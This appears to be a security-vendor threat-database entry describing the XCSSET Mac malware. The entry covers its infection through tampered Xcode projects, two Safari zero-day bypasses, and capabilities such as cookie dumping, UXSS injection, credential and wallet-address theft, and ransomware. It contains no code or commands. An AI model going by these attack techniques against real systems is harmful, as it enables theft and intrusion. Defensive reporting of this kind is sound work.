Threat Database Mac Malware XCSSET Malware

XCSSET Malware

The researches at Trend Micro reported a new malware family that exploits Xcode and can lead to a "rabbit-hole" of malware payloads. The malware threat named XCSSET showcases a rather ingenious idea of the hackers; instead of infecting individual users, their malware burrows inside the Xcode framework. It can then be delivered in supply chain-like attacks.

Xcode is a free IDE (Integrated Development Environment) for the macOS and is used for the development of numerous applications for the Apple ecosystem. Although the exact method hasn't been uncovered, the XCSSET Malware burrows inside and modifies the affected Xcode project to run corrupted code when the project is built. What this means is that unwittingly, the developers would be spreading malware infections to their users. There have already been some developers who uploaded compromised Xcode projects to GitHub.

The XCSSET Malware Exploits Two Safari Vulnerabilities

Once triggered on the victim's device, XCSSET targets the Safari browser through two previously undiscovered vulnerabilities. The first of the zero-day bugs is a method to bypass the SIP (Sistem Integrity Protection) feature that protects the Safari cookies file located in /Library/Cookies/Cookies.binarycookies via an SSHD process. The second zero-day flaw is connected to the Safari WebKit for Developers. It allows XCSSET to circumvent the password step of the WebKit and perform threatening operations without user approval. Dylib Hijacking is also possible.

If the XCSSET Malware is successful, it can wreak havoc thanks to the multitude of features it posses. It can read and dump Safari cookies, and use the packages to carry out UXSS (Universal Cross-site Scripting) attacks by injecting corrupted JavaScript codes into the Web pages displayed by the browser. This can lead to nearly limitless possibilities for the hackers. They can manipulate and replace bitcoin and other cryptocurrency wallet addresses, collect credit card info linked to the Apple store, collect credentials from Google Chrome, Yandex, Apple ID, Paypal and others. Privileged information also can be exfiltrated from additional applications such as Skype, WeChat, QQ and Telegram. The XCSSET Malware also contains a ransomware module with file encryption capabilities and a ransom note.

380 IPs of users infected with XCSSET have been detected by the cybersecurity researchers. Out of them, 152 belonged to users located in China, followed by 103 victims from India.

Infection Vectors

The reason one can say Xcsset is geared towards app developers is that its main infection vector is Xcode projects. The user has to download the infected project, open it and then build it in order for Xcsset to infiltrate the system. The other vector Xcsset can use to propagate is modified apps. This second vector ensures that Xcsset can spread on systems that don't have Xcode installed.


The most probable reason for the deliberate targeting of developers is that in theory Xcsset can spread through the apps created by any developer whose system has been infected with Xcsset. If a prolific developer were to get infected, their apps could be a very significant stream of new infections thus providing Xcsset's operators with potentially thousands of additional victims. Xcsset has a lot of the capabilities one could expect from a trojan. Xcsset installs a trojanized version of Safari or whatever Mac browser the victim may be using. This browser version displays malicious code on pages visited by the victim. Since the malicious code is received from a C2 server and isn't set in stone, the cybercriminals have almost endless options to customize the victim's browsing sessions. One thing Xcsset will do is try to steal the victim's credentials for Google, Paypal, Apple, etc. The browser can replace cryptocurrency addresses in pages so Xcsset can facilitate the theft of cryptocurrencies, at least in theory. Another focus of Xcsset are note taking apps and messengers including WeChat, Telegram, and Skype as well as Apple Notes and Evernote.

It's not clear how successful Xcsset has been so far. At this point, most security solutions for Mac should be able to detect and remove Xcsset. However, since the primary targets of Xcsset are developers and they can unknowingly spread Xcsset through their apps, it's possible that Xcsset may linger for a long time.


Most Viewed